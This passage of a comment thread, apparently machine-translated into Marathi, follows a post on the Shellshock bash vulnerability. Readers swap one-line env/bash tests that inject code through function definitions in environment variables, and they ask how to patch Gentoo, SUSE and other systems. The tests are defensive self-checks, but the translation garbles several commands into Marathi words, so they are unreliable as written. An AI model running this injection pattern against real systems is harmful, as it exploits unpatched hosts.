    env amvariable2 = '() {(a) => sh' sh -c "इको amVulnerable"; बॅश-सी "प्रतिध्वनी अयशस्वी 2 अप्रत्याशित"

  16.   जिझस पेरेल्स म्हणाले

    अद्यतनित करीत आहे ...

  17.   स्विकर म्हणाले

    मला जेन्टोमध्ये उलट घडते, मी फक्त पहिल्या अपयशाला असुरक्षित असतो पण दुसर्‍यासह हे मला मिळते:
    [कोड] श: एक्स: ओळ 1: अनपेक्षित घटकाजवळ कृत्रिम त्रुटी error = '
    sh: X: ओळ 1: '' '
    sh: `X 'साठी फंक्शन व्याख्या आयात करताना त्रुटी
    sh: असुरक्षित: कमांड आढळली नाही
    दोष 2 पॅच नाही
    [/ कोड]
    बगसह निश्चित केलेली बॅशची स्थिर आवृत्ती असेल किंवा नाही हे मला माहित नाही, परंतु पुढील वेळी मी उदय होणा–्या -सिंकेस && उदय -दीप -दीप -समवेत-बीडीएप = आणि न्यूज वापरणे बाकी असेल. @ वर्ल्ड स्टेप मी संपूर्ण सिस्टम अद्यतनित करतो).

    1.    युकिटरू म्हणाले

      माझ्याकडे आवृत्ती 4.2_p50 सह जेंटू आहे आणि आतापर्यंत त्या सर्व चाचण्यांमध्ये उत्तीर्ण झाल्या आहेत. उदयोन्मुख –सिंकीचा प्रयत्न करा आणि नंतर -av1 अ‍ॅप-शेल / बॅश उदय करा आणि नंतर बॅश –version आदेश वापरून आपल्याकडे आवृत्ती 4.2_p50 असल्याचे तपासा.

  18.   फेर म्हणाले

    आपण हे प्रयत्न केला आहे?

    आणि नवीन पॅकेजेससह, रेड हॅट आपल्याला पुरवणारी नवीन चाचणी

    सीडी / टीएमपी; आरएम-एफ / टीएमपी / प्रतिध्वनी; env 'x = () {(a) => b' बॅश -c "प्रतिध्वनी तारीख"; मांजर / टीएमपी / प्रतिध्वनी

    जर आपली सिस्टम असुरक्षित नसल्यास आणि योग्यरित्या पॅच केली गेली असेल तर ती आपल्याला असे काहीतरी देईल
    1 तारीख
    2 मांजर: / tmp / प्रतिध्वनी: फाइल किंवा निर्देशिका विद्यमान नाही

  19.   युकिटरू म्हणाले

    या मार्गाने प्रयत्न करा:

    env X = '() {(a) => sh' sh -c "इको असुरक्षित"; बॅश-सी "प्रतिध्वनी अयशस्वी 2 पॅच"

    मला मिळाले

    असुरक्षित
    बग 2 पॅच केले.

    1.    युकिटरू म्हणाले

      हे विसरून जा, लाइन वाईटरित्या स्वरूपित आहे.

  20.   ऑस्कर मेझा म्हणाले

    उत्कृष्ट! मी माझ्या स्लॅकवेअरवर अद्यतन आधीच केले आहे, धन्यवाद!

  21.   लॉथब्रोक म्हणाले

    नमस्कार, एक प्रश्न उद्भवतो, माझ्याकडे "सुस लिनक्स एंटरप्राइझ सर्व्हर 10" 64 बिटसह बरेच सर्व्हर आहेत.
    मी असुरक्षित असलेल्या आज्ञा चालवताना मी आयफोन 6 एक्सडीच्या कचर्‍यापेक्षाही अधिक असुरक्षित असतो
    जर मी SUSE मध्ये पॅकेजेस अद्यतनित / स्थापित करणे चुकीचे नसलो तर ते y zypper command आदेशासह केले जाते.

    काही सर्व्हरवर हे मला सांगतेः

    द्विपक्षीय: ~ # जिपर अप
    -बॅश: झिपर: कमांड आढळली नाही
    द्विपक्षीय: ~ #

    आणि इतरांमध्ये हेः

    एसएमबी: z # झिप्पर अप
    सिस्टम स्रोत पुनर्संचयित करीत आहे ...
    सुसे लिनक्स एंटरप्राइझ सर्व्हर 10 एसपी 2-20100319-161944 साठी मेटाडेटा विश्लेषित करीत आहे…
    RPM डेटाबेस विश्लेषित करीत आहे ...
    सारांश:
    काही करायला नाही.

    मी काय करू?
    मला माहित आहे की काहीजण म्हणतात की असुरक्षा ते पेंट करतात त्यापेक्षा कमी आहे परंतु माझ्याकडे आहे आणि मला धोका असू नये असे वाटते, ते लहान असो वा महान.

    ग्रीटिंग्ज

  22.   सँडर्स गुटेरेझ म्हणाले

    शुभ संध्याकाळ, मी आपण लेखात प्रदान केलेला कोड पेस्ट करण्याचा प्रयत्न केला आहे, मला तो मिळाला
    सँडर्स @ पीसी-सँडर्स: ~ $ एनव्ही x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे.
    ही परीक्षा आहे
    सँडर्स @ पीसी-सँडर्स: ~ $
    कृपया कृपया मला डिस्ट्रोला कसे पॅच करावे ते सांगता येईल, मी दररोज अद्यतनित करतो आणि मला प्रॉम्प्टच्या आउटपुटमध्ये बदल दिसत नाही.

    धन्यवाद!